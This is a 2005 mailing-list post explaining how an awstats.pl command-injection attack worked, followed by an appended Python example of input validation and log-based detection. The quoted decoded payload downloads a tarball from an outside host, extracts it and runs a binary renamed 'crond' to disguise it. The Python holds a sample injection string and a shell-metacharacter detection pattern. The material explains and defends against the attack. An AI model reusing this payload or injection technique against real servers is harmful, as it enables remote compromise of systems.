Security Breach
Aleksandar Milivojevic
amilivojevic at pbl.ca
Fri Mar 4 18:17:49 UTC 2005
David Cary Hart wrote:
> On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
>>Replace the url-encoded characters and you get:
>>
>>/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget
>>zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv
>>mech crond;export PATH=;crond;echo e_exp;%00
>>
>>So the attacker has tricked the script into executing a set of shell
>>commands, which include changing directory to /tmp, downloading a
>>tarball from a Romanian site, extracting that tarball and then executing
>>a program from the downloaded and extracted tarball, after renaming it
>>to "crond" in an effort to disguise it.
>
> I got that part. What I am trying to understand (please bear with me) is
> how the attacker might have modified the script command line.
It is enough if the script does something as stupid as:
system("cat $configdir/somefile")
(Assuming value of configdir is stored in $configdir variable).
What gets executed is:
cat |echo ; echo b_exp; [...]; echo e_exp;%00/somefile
The last part will produce an error, most likely, but who cares, the
important part was already executed...
It is a classic example of command injection. Most exploits of that
type are for SQL queries. This one is for the shell.
--
Aleksandar Milivojevic <amilivojevic at pbl.ca> Pollard Banknote Limited
Systems Administrator 1499 Buffalo Place
Tel: (204) 474-2323 ext 276 Winnipeg, MB R3T 1L7
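A defender-side illustration of the pattern Aleksandar describes, added here and not part of the thread: the interpolating command beside a hardened equivalent, plus a check that URL-decodes a constructed awstats request log line and flags a configdir value carrying shell metacharacters. The log line, the allow-list rule for configdir and the function names are assumptions of this example, not anything from the thread.

```python
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log line (not from the thread), modelled on the
# URL-encoded awstats request discussed above, shortened to the first commands.
SAMPLE_LOG = (
    '10.0.0.5 - - [04/Mar/2005:17:58:00 +0000] "GET /cgi-bin/awstats.pl?'
    'configdir=%7Cecho%20%3Becho%20b_exp%3Bcd%20%2Ftmp%3Becho%20e_exp%3B%00'
    ' HTTP/1.0" 200 512'
)
BENIGN_LOG = ('10.0.0.5 - - [04/Mar/2005:18:00:00 +0000] '
              '"GET /cgi-bin/awstats.pl?configdir=awstats HTTP/1.0" 200 512')

# Characters that let a value escape a shell command line once interpolated.
SHELL_META = re.compile(r'[|;&`$<>()\n\x00]')

def vulnerable_command(configdir: str) -> str:
    """The pattern from the thread: untrusted value pasted into a shell line."""
    return f"cat {configdir}/somefile"   # what system() would hand to /bin/sh

def is_safe_configdir(configdir: str) -> bool:
    """Allow-list: a plain directory name, no separators or metacharacters."""
    return re.fullmatch(r'[A-Za-z0-9_.-]+', configdir) is not None

def read_somefile(configdir: str) -> subprocess.CompletedProcess:
    """Hardened equivalent: validate, then pass an argv list with no shell."""
    if not is_safe_configdir(configdir):
        raise ValueError(f"rejected configdir value: {configdir!r}")
    return subprocess.run(["cat", f"{configdir}/somefile"],
                          capture_output=True, text=True, check=False)

def request_target(log_line: str) -> str:
    """Pull the request target out of a Common Log Format line."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', log_line)
    return m.group(1) if m else ""

def injected_configdir(log_line: str):
    """Decode the query string; return the configdir value if it carries
    shell metacharacters, otherwise None."""
    query = urlsplit(request_target(log_line)).query
    for value in parse_qs(query, keep_blank_values=True).get("configdir", []):
        if SHELL_META.search(value):
            return value
    return None

if __name__ == "__main__":
    print("flagged:", injected_configdir(SAMPLE_LOG))   # decoded payload
    print("benign :", injected_configdir(BENIGN_LOG))   # None
```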